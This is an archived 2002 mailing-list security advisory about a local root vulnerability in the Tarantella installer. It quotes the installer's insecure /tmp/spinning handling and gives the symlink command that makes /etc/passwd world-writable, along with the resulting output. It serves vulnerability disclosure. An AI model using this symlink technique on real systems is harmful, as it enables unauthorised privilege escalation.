Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: Larry W. Cashdollar (lwcvapid.dhs.org)
Date: Tue Feb 19 2002 - 07:22:55 CST
-----BEGIN PGP SIGNED MESSAGE-----
Larry W. Cashdollar
Another local root vulnerability during installation of Tarantella
During installation a "twirling / \ | - " text graphic is displayed (you
remember them from the shareware games in DOS days..) they create a file
in /tmp called spinning to determine at what state the installation is at.
The files permissions are changed toread write excute for all, removed and
recreated during different stages of the installation. It is vulnerabile to
a simple symlink attack.
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1
There is no race condition here, just create the link.
[lwcmisery] ln -s /etc/passwd /tmp/spinning
Wait until root is done installing...
[lwcmisery] ls -l /etc/passwd
- -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd
I again recommend the target system is running in single user mode before this
software is installed.
The vendor has been notified and plans to fix this in the next release.
-----END PGP SIGNATURE-----